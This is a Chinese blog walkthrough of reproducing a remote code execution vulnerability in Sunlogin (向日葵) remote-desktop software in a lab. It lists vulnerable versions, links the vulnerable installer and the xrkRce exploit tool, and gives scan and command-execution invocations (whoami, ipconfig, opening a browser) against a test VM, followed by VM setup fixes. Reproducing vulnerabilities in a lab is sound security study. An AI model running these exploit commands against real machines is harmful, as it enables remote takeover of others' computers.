【视频教程】向日葵远程代码执行漏洞复现过程

相关阅读

之前在网络安全社区里看到有热心网友共享了相关的资料

视频复现

图文教程

准备测试环境

1.windows虚拟机(内网IP地址192.168.244.132)

2.kali linux (内网IP地址192.168.244.128)

附录:windows虚拟机镜像 下载地址https://pan.iculture.cc/s/WqyHa

向日葵软件

存在漏洞向日葵版本:11.1.1、10.3.0.27372、11.0.0.33162

我们这里提供存在漏洞版本,您可以下载测试

https://pan.iculture.cc/s/gRQsV

漏洞扫描工具

我们实验里是在kali linux里运行的,因此选择Linux版本下载好

扫描漏洞

我们先进行漏洞扫描,确认漏洞存在端口,输入下面的命令

./xrkRce -h 192.168.244.132

这里发现端口为49227

图片[1]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

那我们现在对漏洞进行利用,进行远程命令执行

./xrkRce -h 192.168.244.132 -c "whoami" -p 49227 -t rce 
图片[2]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

比方说,查看本机IP信息

./xrkRce -h 192.168.244.132 -c "ipconfig" -p 49227 -t rce 
图片[3]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

再比方说,打开浏览器,访问我的博客,给用户一个惊喜

./xrkRce -h 192.168.244.132 -c "start www.iculture.cc" -p 49227 -t rce 

本次实验的一些坑

windows7 打开向日葵提示连接服务器失败

您需要关闭windows防火墙就好了,操作方式如下

图片[4]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog
图片[5]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog
图片[6]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog
图片[7]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog
图片[8]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

Windows7安装vmware tools问题

老版本的vmware可以直接忽略,我们这里是用的最新的16版本

如果你的Windows镜像安装后Vmwaret Tools安装为灰色

请点击软盘,连接修改为使用物理驱动器(自动检测)

图片[9]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

然后手动安装

图片[10]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog
图片[11]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog
图片[12]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

如果提示签名验证错误,请按照下面两种方法进行操作

解决办法1:安装系统补丁

由于微软更新了驱动程序签名算法,2019年开始弃用SHA1,改用SHA2。猜测VMware Tools驱动程序使用SHA2,而Windows7只支持SHA1,需要下载安装补丁kb4474419来支持SHA2算法。下载地址:https://www.catalog.update.microsoft.com/Search.aspx?q=kb4474419

解决方法2:使用旧版VMware的tools

我们这里使用这种解决方案,进入下载页面,下载

图片[13]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

然后修改CD/DVD(SATA),使用ISO映像文件,选择VMware-tools-windows-11.0.0-14549434.iso

图片[14]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

然后在虚拟机中安装Vmware Tools

图片[15]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog

然后就不会报错了,因为我们这里用的旧版的vmwaretools

图片[16]-【视频教程】向日葵远程代码执行漏洞复现过程-FancyPig's blog
© 版权声明
THE END
喜欢就支持一下吧
点赞21赞赏 分享
评论 共3条

请登录后发表评论